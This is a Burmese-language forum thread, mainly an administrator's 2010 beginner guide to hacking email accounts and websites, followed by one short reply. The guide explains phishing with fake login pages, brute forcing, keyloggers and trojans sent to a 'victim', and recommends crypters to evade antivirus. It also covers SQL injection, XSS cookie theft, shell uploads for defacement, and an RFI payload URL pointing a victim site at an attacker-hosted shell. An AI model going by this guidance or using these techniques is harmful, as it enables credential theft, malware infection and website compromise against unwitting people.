| ဟတ္ကာ | Date: Monday, 2010-10-11, 7:09 PM | Message # 1 |
|
Major
Group: Administrators
Messages: 91
Status: Offline
| အျခား အျခားေသာ forumေတြ၊ websiteေတြမာ "Email က က်ေနာတ ဘယလ hack ႏငသလဲ?
ခငဗ်ားက်ေနာအတြက hack ေပးႏငမလား ? ဆျပး သနးေပါငးမ်ားစြာေသာလေတြ ေမးေနၾကတာက
သတျပဳမၾကမယ ထငပါတယ။ ဒအတြကေၾကာင ဒ post ျဖစလာရတာျဖစျပး သငအတြက hacking နဲ
ဆငတဲ အေျခခအေတြးအေခၚေလးေတြက ေဖာျပထားမာ ျဖစပါတယ။ ဒါေတြက ဘယလဆငပြားျပး
အသးခ်ရမယဆတာကေတာ သင ကယကကယ အားကးရပါလမမယ။
ေနာကခအေျခအေန
Hack တဲ နညးလမးေတြက Windows 98 ဒဇငးျပဳလပျပးကတညးက စတငခဲတာျဖစပါတယ။ Hacking
ဆတာ အေျခခအားျဖငေတာ ေပ်ာကြက ဟာကြက ကြငးဆကေတြက ရာေဖြျပး ၄ငးတထဲကမာ
အခ်ဳ႕ယစမႏငတဲ holeေတြကေန information ေတြထြကလာေအာင ၾကဳးစားတာျဖစျပး သငအတြက
အေရးပါႏငတဲ Passwordမ်ား၊ Credit Card နဲသကဆငတဲ အေသးစတအခ်ကအလကမ်ားက ရယခ်င
ရယႏငပါတယ။ တခါတရမာေတာ ပဂဳလေရးဆငရာ တကခကမေတြအတြက အသးျပဳၾကပါတယ။
သတျပဳရနအေၾကာငးအရာ
က်ေနာ အၾကေပးခ်ငတာကေတာ ေကာငးမြနတဲ Site ေတြကေန ေဆာငးပါးေတြ၊ ပခ်ခ်ကေတြက
ေသခ်ာဖတရေလလာဖလပါတယ။ ဒါဟာ သငအတြက Hacking က ေလလာျခငးမာ တစခတညးေသာ
နညးလမးျဖစပါတယ။
မတဆက
အဓကက်တဲ အခ်ကေတြ ကပဲ ေဖာျပျပး hacking နညးလမး အခ်ဳ႕႕ က အက်ဥးခ်ဳပ
ေဆြးေႏြးသြားမာျဖစပါတယ။ Hacking မာ အေျခခအားျဖင အဓကက်တဲ အပငး ႏစပငးအေနနဲ
ကြဲထြကေနပါတယ။ အဲဒါကေတာ...
၁။ Email (သ) User information
၂။ Web based hacking တပဲျဖစပါတယ။
Email (သ) User information ယေနအခ်နကာလမ်ားမာ အမ်ားဆးအသးျပဳေနက်ျဖစတဲ ၊ Email, Passwords, Credit Card details စတဲ
user information မ်ားက hack တဲအခါ ေက်ာၾကားေနတဲ နညးလမးေတြကေတာ
ေအာကပါအတငးျဖစပါတယ...
(က) Phishing
( ခ ) Brute Forcing
( ဂ ) Keylogging
(ဃ) Trojans
(က) Phishing
Phishing ဆတာကေတာ ပမနအားျဖင ထးျခားတဲ တကခကမတစချဖစပါတယ။ hacker ေတြက အခ်ဳ႕
website (သ) gmail နဲ လး၀နးပါးဆငတတဲ page တစခက ဖနတးလကျခငးျဖစပါတယ။ ဒ page ေတြက
hacker ေတြက သတရဲ႕ ကယပင server ေတြမာ upload လပၾကပါတယ။ အဲဒေနာက user
အသစေတြဆက အဲဒ link ေတြေပးပပါတယ။ user ေတြက အဲဒ link ကဖြငလကတဲ အခါ user ေတြ အေနနဲ
သတ ေရာကခ်ငတဲ website (သ) gmail လထငျပး သတရဲ႕ username နဲ password ေတြက ရကထညျပး
sign in (သ) submit က click လကျပဆရငေတာ အဲဒ user ရဲ႕ information ေတြက hacker
ကရရသြားပါျပ။ ဒနညးလမးက hacking ေလာကထဲက ၀ငေရာကဖၾကဳးစားေနၾကတဲ လသစေတြ
က်ယက်ယျပနျပနအသးျပဳေနတဲ နညးလမးတစချဖစပါတယ။ ဒနညးလမးရဲ႕ ျပဳလပပအဆငဆငက Simple
Hacking ( Fake Login ျပဳလပျခငး) ဆတဲ post မာေဖာျပခဲျပးျဖစပါတယ။
ဒနညးလမးက အသးျပဳျပး အႏယမာ ရတဲ ICICI bank နဲပတသတျပး ျဖစခဲတဲ သာဓက တစခရပါတယ။
မ်ားစြာေသာ user info ေတြက ဒနညးလမးက အသးျပဳျပး အခးခခဲရတာျဖစပါတယ။
အားနညးခ်က :
လေတာေတာမ်ားမ်ားက ဒနညးလမးက အသးျပဳဖၾကဳးစားေနဆဲျဖစပါတယ။ ဒါေပမယ ဒနညးလမးမာ
အားနညးခ်ကတစခရေနပါတယ အဲဒါကေတာ သားေကာငဟာ internet နဲပတသတျပး ဗဟသတ
အနညးငယရရနဲ ဒ page ဟာ အစစမဟတမနးသႏငပါတယ... ဘာေၾကာငလဲဆေတာ သက URL က
ဖတၾကညမယ ဒါဆရင မရငး website မဟတဘးဆတာက နားလညသြားႏငပါတယ။
( ခ ) Brute Forcing
Brute Forcer ဆတာကေတာ အေျခခအားျဖင cracker လေခၚဆႏငတဲ program တစချဖစပါတယ။ အဲဒ Brute Forcer ထဲမာသငက သင hack ခ်ငတဲ username က ထညသြငးရပါမယ...ျပးေတာ notepad file
တစခကလညး password တစခကဲသထညသြငးရမာျဖစျပး အဲဒ notepad ထဲမာ ရသမ် အားလးနးပါး
အဂၤလပဘာသာစာလးေတြ ပါရရမာျဖစပါတယ။ ၄ငးက ဘယလအလပလပသလဲဆေတာ password မာပါတဲ
စာလးတစလးစတငးအတြက notepad file ထဲမာ ရသမ် စာလးတငးနဲ တကၾကညပါတယ။
အားလးတညသြားျပ ဆရငေတာ ပြဲသမးပဲေပါ...။ တျခား forum ေတြမာ " huge pass list" ဆတဲ ေခါငးစဥက
သတျပဳမခ်ငျပဳမပါလမမယ။ ၄ငးတက ဘာမေတာမဟတပါဘး...ဒါေပမယ သငရဲ႕ bruteforcer ထဲက
ထညသြငးဖ password list ျဖစပါတယ။
အားနညးခ်က :
၁။ တခါတရမာ brute forcing ဟာ အခ်နအလြနၾကာျမငတတပါတယ။
၂။ ၄ငးဟာ အာမခခ်က မရပါဘး
၃။ ယေနအခ်နကာလမာဆရင လေတာေတာမ်ားမ်ားဟာ alpha-numeric-symbol password
ေတြရေနၾကပါျပ။ bruteforcer အတြက ၄ငးတက detect လပဖ အလြနခကခဲပါတယ။
၄။ ေက်ာၾကားတဲ gmail ကဲသေသာ site ေတြမာ ျပဳလပထားတဲ ဒဇငးတစခကေတာ login လပတဲအခါ ၃
ခါထကေက်ာျပး မားယြငးေနျပးဆရင ၄ငးတ႕ က "image captcha" ကထညလကတဲအတြက bruteforcer
က ရပသြားေစပါတယ။
( ဂ ) Keylogging
Keylogger ကေတာ "server" လ ေခၚဆႏငတဲ file ေသးေသးေလးေတြက ဖနတးဖအတြက သငက
ကညေပးပါလမမယ။ သငက သငရဲ႕ server က သားေကာင ဆသ ေပးပရမာျဖစပါတယ။ သငရဲ႕
သားေကာငက အဲဒအေပၚမာ click လကရငေတာ ကစျပး ပါျပ။
ဒနညးလမးဟာ တစစတစေယာကက hack ဖအတြက အေကာငးဆးနညးလမးတစခ ျဖစႏငပါတယ။
Keylogger ဆတာကေတာ သငသားေကာငရဲ႕ computer ထဲမာ သဟာသ install လပႏငတဲ program
တစချဖစျပး သငသားေကာငက သရဲ႕ keyboard ေပၚမာ ရကလကသမ် keystrokeတငးက
မတတမးတငထားပါတယ။ ျပးရင ၄ငးက မတတမးတငလ ရသမ်ေတြက hacker ဆသေပးပပါတယ။
keystroke ( ဆလတာက FTP, Email , Messengers ) က လကခရရဖ အမ်ားၾကးလမးရပါတယ။
က်ေနာအေနနဲေျပာရရင ဒနညးလမးဟာ သငရဲ႕ သားေကာငက လညစားျပး သတရဲ႕ information ေတြက
ရယဖအတြက အေကာငးဆးနညးလမးတစချဖစပါတယ။ ( Keylogger Collection )
အားနညးခ်က : ၁။ သငရဲ႕ သားေကာငက keylogger ကလကခရရတဲ အခါ သတရဲ႕ antivirus ေတြက keylogger က
အလအေလ်ာက delete လပလကျခငးျဖစပါတယ။ ဒါေၾကာင သငအေနနဲ တစစတစရာ
လညျဖားျခငးအားျဖင antivirus က disable လပဖ စညးရးသမးသြငးရမာ ျဖစပါတယ။
၂။ တခါတရမာ keylogေတြက ေပးပေနတဲအခ်နမာ firewall က block လပလကျခငးမ်ားပဲ ျဖစပါတယ။
အၾကံျပဳခ်က္ - က်ေနာအၾကေပးလတာကေတာ "crypters" လေခၚတဲ program ေတြက အသးျပဳဖပါပဲ။
၄ငးတက သငရဲ႕ server ေတြက ရာေဖြမေတြပဲ ျပဳလပႏငေစဖကညေပးပါလမမယ။ ဒါဆရင
သငသားေကာငရဲ႕ anti-virus ေတြက ၄ငးတက detect မလပႏငေတာပါဘး။ Anti-Virus နဲ
တတပနးတမးကစားၾကမယ ဆတဲ post မာ Crypter ေတြက တငေပးထားခဲျပး ျဖစပါတယ။
(ဃ) Trojans
Trojan ေတြကေတာ keyloggerေတြရဲ႕ ဖခင နဲတပါတယ။ Trojan ေတြက အေပၚမာ ေဖာျပခဲတဲ keylogger
ေတြအတငးပဲ သငဆက keylog ေတြ ေပးပပါတယ။ ဒါအျပင ၄ငးတက သငသားေကာငးရဲ႕ computer က
သင ထနးခ်ဳပမ ရေစပါတယ။ သငသားေကာငရဲ႕ computer မာ သငစတၾကဳက fileေတြက Edit / delete/
upload/ download လပႏငပါတယ။ Trojan ေတြမာ keyboard က ေကာငးေကာငး အလပမလပေအာင (
keyboard မာ ကယႏပလကတဲ စာလးက တစခ ေပၚေနတာက တစခ ေပၚခ်ငတဲ စာလးေလ်ာကေပၚေနတာ၊
တခါတေလ keys ေတြက ရကလရတဲ အခါ ရတယ မရတဲ အခါလညး မရဘး အဲလမ်ဳးေတြေပါ )၊ CD ROM
ေတြ Eject လပတဲ အခါ ထြကမလာတာ ၊ CD ျပနထညေပးဖအတြက ေတာငးဆတာ စသျဖင အျခား
အျခားေသာ feature ေတြလညး ပါ၀ငပါေသးတယ။ ( Trojan Toolမ်ား )
အားနညးခ်က :
keylogger ေတြနဲ အတတပါပဲ။
အၾကံျပဳခ်က္ - keylogger မာ အၾကဳျပဳခဲသလပါပဲ crypter ေတြသးပါ။
Web Hacking
က်ေနာက ဘယ website မဆ hack ဖအတြက hacker ေတြက အကအညေပးႏငတဲ
အသးျပဳမအမ်ားဆးျဖစတဲ web hacking နညးပညာ အခ်ဳ႕ က ေဆြးေႏြးေပးသြားပါမယ။ တဘကကၾကညရငလညး ဒါဟာ သင site က ကာကြယဖအတြက ကညပါလမမယ။
(က)SQL Injection
( ခ ) XSS
( ဂ) Shells
(ဃ) RFI
( င ) ေနာကထပအမ်ားၾကး ရပါေသးတယ။ ဒါေပမယ ဒမာေတာ အသးျပဳမအမ်ားဆးျဖစတာကပဲ
ေဆြးေႏြးသြားမာ ျဖစပါတယ။
(က) SQL Injection
ယေနအခ်နအခါမာ website အမ်ားစဟာ SQL Database တစခနဲ connect လပထားၾကပါတယ။ SQL
Databaseက သတရဲ႕ website သ လာေရာကလာပတသက register လပသြားတဲအခါ username နဲ
password ေတြ ( encrypt လပျပး )က သမးဆညးထားဖအတြက သတက ကညပါတယ။ SQL database
က user တစေယာက logs in လပတဲ အခါတငးမာ ေမးခြနးေတြေမးျမနးတဲ အလပငနးစဥက
လပေဆာငပါတယ။ ၄ငးတ database ဆသြားျပး မနကနေသခ်ာတဲ password ဟတမဟတ ၾကညပါတယ။
အကယ၍ မနကနတယဆရငေတာ user က log in လကပါတယ၊ မမနဘးဆရငေတာ error တစခက
ေပးပါလမမယ။ ဒါေၾကာင အေျခခေဆာငရြကခ်ကကေတာ database မာရတဲ internet information က
အသးခ်ဖၾကဳးစားျပး database ထဲမာရတဲ database ထဲမာ ေမးခြနးတစခက စစေဆးဖ command တစခက
လကနာေဆာငရြကေနျခငးျဖစပါတယ။ ဒနညးလမးနဲ ပတသတျပး ဒ post ထဲမာ ထညသြငဖဆတာ
တကယက မျဖစႏငပါဘး။ ဘာေၾကာငလဲဆေတာ ဒနညးလမးဟာ website က hack ဖအတြက
နညးလမးေတြထဲမာ အရပေထြး အခကခဲဆးနညးလမးတစခ ျဖစလပါ။
သငရဲ႕ website မာ RFI attach လပဖ အားနညးခ်ကရလား မရလားဆတာက သခ်ငရင
ေအာကပါအတငးျပဳလပပါ...
အကယ၍ သင site ရဲ႕ URL က....
yoursite.com/index.php?id=545
ျဖစေနတယဆရင ၄ငးရဲ႕ အဆးမာ ( ' ) က ေအာကမာ ျပထားသလမ်ဳး ေပါငးထညေပးပါ...
yoursite.com/index.php?id=545'
( ခ ) XSS
XSS ကေတာ အခ်ဳ႕ website ေတြက hack ဖအတြက ေကာငးမြနတဲ အျခားနညးလမးတစခလ
ဆႏငပါတယ။ အခ်ဳ႕ website/ forum ေတြက post ( သ ) ေဆာငးပါး ေတြထဲမာ HTML ခြငျပဳခဲမယဆရင
hacker က content ထဲက အႏရာယရတဲ script ေတြက post လပႏငပါတယ။ ဒါေၾကာင ဘယအခ်နမဆ
user တစေယာကက page ကဖြငလကတငး cookieေတြက hacker ဆကေပးပပါလမမယ။ ဒအတြက သက
user ကဲသ log in လပႏငျပး website က #$%@# လပပါေတာတယ။
( ဂ ) Shells
Shell ဆတာကေတာ အႏရာယရတဲ .php script ျဖစပါတယ။ ၄ငးကဘယလလပရမလဲ ဆေတာ avaters,
recepie, tricks , feedbacks ကဲသေသာ ဘယဖငမဆ upload လပႏငတဲ website တစခခမာ ေနရာ တစခ
ရာပါ။ ျပးရင သငရဲ႕ shell file က အဲဒထဲက upload လပႏငဖၾကဳးစားပါ။ upload ျပးသြားရင ၄ငးက URL
bar မာဖြငပါ။ အဲဒ webhosting ရဲ႕ FTP account တစခလးက သင ျမငရပါလမမယ။ index page
ထဲဲမာပါ၀ငသမ်က သငစတၾကဳက rename/Edit/upload/download ၾကဳကသလလပလရပါျပ။
အခလျပဳလပျခငးက deface လလညး ေခၚပါတယ။
(ဃ) RFI
RFI ကလညး website တစခက deface လပဖအတြက ေကာငးတဲနညးလမးတစခပဲ ျဖစပါတယ။ ၄ငးက
shell နဲအတအသးျပဳရမာ ျဖစပါတယ။ ၄ငးက သငရဲ႕ shell ေပၚမာ upload လပျပးျပး ဆရင
သငကအေထာကအကေပးပါလမမယ...
yoursite.com/shell.txt
သငက RFT သ အားနညးခ်ကရတဲ site တစခက ရာေတြရပါမယ... အဲဒေနာက ေအာကမာျပထားတဲ
အတငး ျပဳလပႏငပါတယ...
victimssite.com/index.php?page=yousite.com/shell.txt
ဒဟာက သငက သငသားေကာငရဲ႕ sites FTP ၀ငလမး က ထပေပးပါလမမယ။ shell မာလပဲ
သငၾကဳကသလ သငစတၾကဳက လပလရပါျပ။
အကယ၍ သငက သင website က RFI attach လပဖ အားနညးခ်က ရလား မရဘးလားဆတာက
စစေဆးခ်ငရင ေအာကပါအတငး လပပါ...
အကယ၍ သင site ရဲ႕ URL က
yoursite.com/index.php?id=545
ျဖစေနခဲရင ၄ငးရဲ႕ အဆးမာ ေအာကမာျပထားတဲ အတငး ေပါငးထညေပးပါ...
yoursite.com/index.php?id=http://www.google.com
အကယ၍ သင page ထဲမာ google page ပါ၀ငေနမယဆရငေတာ အဲဒအဓပာယက RFI သ
တြဲဆကျခငးမာ ေပ်ာကြကတစချဖစပါတယ။
|
| |
| |
| စ်ာန္ | Date: Friday, 2011-07-22, 9:32 AM | Message # 2 |
|
Private
Group: Users
Messages: 1
Status: Offline
| Simple hacking(Fake login) ဆုိတာဘယ္နားမွာလဲဟင္ ရွာတာ ရွာမေတြ႔လို႕
|
| |
| |
